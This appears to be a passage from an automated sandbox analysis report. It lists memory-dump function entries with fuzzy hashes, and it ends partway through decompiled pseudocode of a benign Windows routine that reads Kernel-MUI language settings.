                                • Associated: 00000007.00000002.2279274210.0000000000B10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279284137.0000000000B14000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279293748.0000000000B17000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279302550.0000000000B20000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279338013.0000000000B80000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                • Instruction ID: 165250f8074bc0ef9cdc504fa449021ea13c8322197c03fc884fef66fc1cad38
                                • Opcode Fuzzy Hash: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                • Instruction Fuzzy Hash: 23B01272140580C7E31D9718D906B5B7610FB80F00F008D3AA04781CA1DBB89A2CE44A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00A2F8CC, Relevance: .0, Instructions: 6COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000007.00000002.2279175363.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true
                                • Associated: 00000007.00000002.2279170485.0000000000A10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279267315.0000000000B00000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279274210.0000000000B10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279284137.0000000000B14000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279293748.0000000000B17000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279302550.0000000000B20000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279338013.0000000000B80000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                • Instruction ID: b608c8617bc096b37df9be2f0bc93e64f466faa20b7dbfb3ee59c54b4bfc8c85
                                • Opcode Fuzzy Hash: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                • Instruction Fuzzy Hash: EBB01275100540C7F304D704D905F4AB311FBD0F04F40893AE40786591D77EAD28C697
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00A31930, Relevance: .0, Instructions: 6COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000007.00000002.2279175363.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true
                                • Associated: 00000007.00000002.2279170485.0000000000A10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279267315.0000000000B00000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279274210.0000000000B10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279284137.0000000000B14000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279293748.0000000000B17000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279302550.0000000000B20000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279338013.0000000000B80000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                                • Instruction ID: 3aeeca65ea1aaf37b62c9893cb2d02334d47a3b29990fed3fb0e6cbc500f1d8d
                                • Opcode Fuzzy Hash: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                                • Instruction Fuzzy Hash: 52B01272100940C7E34AA714DE07B8BB210FBD0F01F00893BA04B85D50D638A92CC546
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00A2F938, Relevance: .0, Instructions: 6COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000007.00000002.2279175363.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true
                                • Associated: 00000007.00000002.2279170485.0000000000A10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279267315.0000000000B00000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279274210.0000000000B10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279284137.0000000000B14000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279293748.0000000000B17000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279302550.0000000000B20000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279338013.0000000000B80000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                • Instruction ID: d523cc507bde657408e54325c2dcaf12b60df831943b7985b4c6fe4931788f26
                                • Opcode Fuzzy Hash: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                • Instruction Fuzzy Hash: FCB0927220194087E2099B04D905B477251EBC0B01F408934A50646590DB399928D947
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00A2FAB8, Relevance: .0, Instructions: 6COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000007.00000002.2279175363.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true
                                • Associated: 00000007.00000002.2279170485.0000000000A10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279267315.0000000000B00000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279274210.0000000000B10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279284137.0000000000B14000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279293748.0000000000B17000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279302550.0000000000B20000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279338013.0000000000B80000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00A2FA20, Relevance: .0, Instructions: 6COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000007.00000002.2279175363.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true
                                • Associated: 00000007.00000002.2279170485.0000000000A10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279267315.0000000000B00000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279274210.0000000000B10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279284137.0000000000B14000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279293748.0000000000B17000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279302550.0000000000B20000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279338013.0000000000B80000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                                • Instruction ID: 9b5f4fb9875c6876c932e4128e9800c708acc4d40f0b969179b44b3e8b2884d0
                                • Opcode Fuzzy Hash: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                                • Instruction Fuzzy Hash: 4FB01272100580C7E30D9714D90AB4B7210FB80F00F00CD3AA00781861DB78DA2CD45A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00A2FA50, Relevance: .0, Instructions: 6COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000007.00000002.2279175363.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true
                                • Associated: 00000007.00000002.2279170485.0000000000A10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279267315.0000000000B00000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279274210.0000000000B10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279284137.0000000000B14000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279293748.0000000000B17000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279302550.0000000000B20000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279338013.0000000000B80000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                                • Instruction ID: 2cae8b11bd858d750de1a79d340ce6dfe3ec44f87311ce0e8d0be64a47f0ebf6
                                • Opcode Fuzzy Hash: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                                • Instruction Fuzzy Hash: 9BB01272100544C7E349A714DA07B8B7210FB80F00F008D3BA04782851DFB89A2CE986
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00A2FBE8, Relevance: .0, Instructions: 6COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000007.00000002.2279175363.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true
                                • Associated: 00000007.00000002.2279170485.0000000000A10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279267315.0000000000B00000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279274210.0000000000B10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279284137.0000000000B14000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279293748.0000000000B17000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279302550.0000000000B20000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279338013.0000000000B80000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                • Instruction ID: 9452a8d0b0f104eb9e4922b1c8778681c83a3ee0f3d85b1ffb0a7dc5c1b1eaf2
                                • Opcode Fuzzy Hash: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                • Instruction Fuzzy Hash: 9AB01272100640C7E349A714DA0BB5B7210FB80F00F00893BE00781852DF389A2CD986
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00A2FB50, Relevance: .0, Instructions: 6COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000007.00000002.2279175363.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true
                                • Associated: 00000007.00000002.2279170485.0000000000A10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279267315.0000000000B00000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279274210.0000000000B10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279284137.0000000000B14000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279293748.0000000000B17000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279302550.0000000000B20000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279338013.0000000000B80000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00A2FC30, Relevance: .0, Instructions: 6COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000007.00000002.2279175363.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true
                                • Associated: 00000007.00000002.2279170485.0000000000A10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279267315.0000000000B00000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279274210.0000000000B10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279284137.0000000000B14000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279293748.0000000000B17000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279302550.0000000000B20000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279338013.0000000000B80000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                • Instruction ID: bea31e52b4947098166a5853b381437c0ce687cada8622438d1654f6fc3cd67c
                                • Opcode Fuzzy Hash: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                • Instruction Fuzzy Hash: B2B01272140540C7E3099714DA1AB5B7210FB80F00F008D3AE04781891DB7C9A2CD486
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00A2FC48, Relevance: .0, Instructions: 6COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000007.00000002.2279175363.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true
                                • Associated: 00000007.00000002.2279170485.0000000000A10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279267315.0000000000B00000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279274210.0000000000B10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279284137.0000000000B14000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279293748.0000000000B17000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279302550.0000000000B20000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279338013.0000000000B80000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                • Instruction ID: ba27d4cd5f553268e31cb600e7e3d5a3e50323ff6ed211678ad30f7188510e08
                                • Opcode Fuzzy Hash: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                • Instruction Fuzzy Hash: 39B01272100540C7E319A714D90AB5B7250FF80F00F00893AE10781861DB38992CD456
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00A31D80, Relevance: .0, Instructions: 6COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000007.00000002.2279175363.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true
                                • Associated: 00000007.00000002.2279170485.0000000000A10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279267315.0000000000B00000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279274210.0000000000B10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279284137.0000000000B14000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279293748.0000000000B17000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279302550.0000000000B20000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279338013.0000000000B80000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                • Instruction ID: c40cb18f784fb740092d7f35057b9839572fe11e4001cfe90af8ac8386c88b07
                                • Opcode Fuzzy Hash: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                • Instruction Fuzzy Hash: A6B09271508A40C7E204A704D985B46B221FB90B00F408938A04B865A0D72CA928C686
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00A2FD5C, Relevance: .0, Instructions: 6COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000007.00000002.2279175363.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true
                                • Associated: 00000007.00000002.2279170485.0000000000A10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279267315.0000000000B00000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279274210.0000000000B10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279284137.0000000000B14000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279293748.0000000000B17000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279302550.0000000000B20000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279338013.0000000000B80000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                • Instruction ID: 152fdd420af7dfcc6df86c72954370e6eab1db85fd0a81c34441345ed48de2b3
                                • Opcode Fuzzy Hash: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                • Instruction Fuzzy Hash: 27B01272141540C7E349A714D90AB6B7220FB80F00F00893AE00781852DB389B2CD98A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00A2FE24, Relevance: .0, Instructions: 6COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000007.00000002.2279175363.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true
                                • Associated: 00000007.00000002.2279170485.0000000000A10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279267315.0000000000B00000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279274210.0000000000B10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279284137.0000000000B14000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279293748.0000000000B17000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279302550.0000000000B20000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279338013.0000000000B80000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                • Instruction ID: 4523e9276363b51c29093556ee00c3605be97a6a096d126b10744d78506899f7
                                • Opcode Fuzzy Hash: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                • Instruction Fuzzy Hash: E7B012B2104580C7E31A9714D906B4B7210FB80F00F40893AA00B81861DB389A2CD456
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00A2FFFC, Relevance: .0, Instructions: 6COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000007.00000002.2279175363.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true
                                • Associated: 00000007.00000002.2279170485.0000000000A10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279267315.0000000000B00000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279274210.0000000000B10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279284137.0000000000B14000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279293748.0000000000B17000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279302550.0000000000B20000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279338013.0000000000B80000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                • Instruction ID: 5af6445773ea8696aa9cd62fdf5509cf1cb9f7b4cf56a5a77559796e3d2133fe
                                • Opcode Fuzzy Hash: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                • Instruction Fuzzy Hash: 07B012B2240540C7E30D9714D906B4B7250FBC0F00F00893AE10B81850DA3C993CC44B
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00A2FF34, Relevance: .0, Instructions: 6COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000007.00000002.2279175363.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true
                                • Associated: 00000007.00000002.2279170485.0000000000A10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279267315.0000000000B00000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279274210.0000000000B10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279284137.0000000000B14000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279293748.0000000000B17000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279302550.0000000000B20000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279338013.0000000000B80000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                • Instruction ID: c0177d7ad0d10355b3c7d2619bc7f24452a3c2aab25a1a733e07692cdee9b307
                                • Opcode Fuzzy Hash: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                • Instruction Fuzzy Hash: B1B012B2200540C7E319D714D906F4B7210FB80F00F40893AB10B81862DB3C992CD45A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00A58788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                Download Yara Rule
                                C-Code - Quality: 94%
                                			E00A58788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E00A58460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E00A3E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E00A5718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E00A58460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E00A3E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E00A5718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E00A58460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E00A58460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E00A58460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E00A3E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E00A3E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E00A5718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E00A3E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E00A32340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E00A4E679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E00A3E2A8(_t322,  &_v68, _v16);
								if(E00A55553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E00A4E679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E00A3E2A8(_t322,  &_v68, _t236);
								if(E00A55553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E00A3E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E00A3E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E00A5718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E00A3E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E00A32340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E00A4E679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E00A3E2A8(_v12,  &_v68, _v16);
							if(E00A55553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E00A4E679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E00A3E2A8(_t322,  &_v68, _t269);
							if(E00A55553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E00A3E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E00A3E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E00A5718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E00A3E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E00A32340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E00A4E679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E00A3E2A8(_v12,  &_v68, _v16);
						if(E00A55553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E00A4E679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E00A3E2A8(_t322,  &_v68, _t296);
